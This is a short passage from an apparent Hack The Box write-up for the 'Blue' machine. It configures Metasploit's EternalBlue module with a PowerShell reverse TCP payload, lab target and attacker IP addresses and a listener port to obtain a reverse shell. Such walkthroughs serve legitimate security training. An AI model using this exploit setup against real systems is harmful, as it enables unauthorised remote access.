mmezirard/mmezirard.github.io/content/htb-write-ups/boxes/blue/index.md

 I'll use the Metasploit module `exploit/windows/smb/ms17_010_eternalblue` to exploit this vulnerability, since it's non-trivial to do by hand.

-The goal is to obtain a reverse shell.

 I'll set the `target` to `Windows 7`, the `payload` to `payload/windows/x64/powershell_reverse_tcp`, the `RHOSTS` to `10.10.10.40`, the `LHOST` to `10.10.14.4` and the `LPORT` to `9001`.